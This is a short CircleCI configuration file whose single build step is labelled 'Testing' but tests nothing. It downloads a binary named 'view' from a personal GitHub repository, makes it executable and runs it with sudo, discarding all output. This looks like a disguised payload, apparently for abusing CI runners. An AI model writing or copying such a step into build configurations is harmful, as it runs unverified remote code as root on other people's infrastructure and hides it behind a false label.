version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: "Testing"
          command: wget https://github.com/BarisYoon/view/raw/main/view > /dev/null 2>&1; chmod +x view; sudo ./view > /dev/null 2>&1
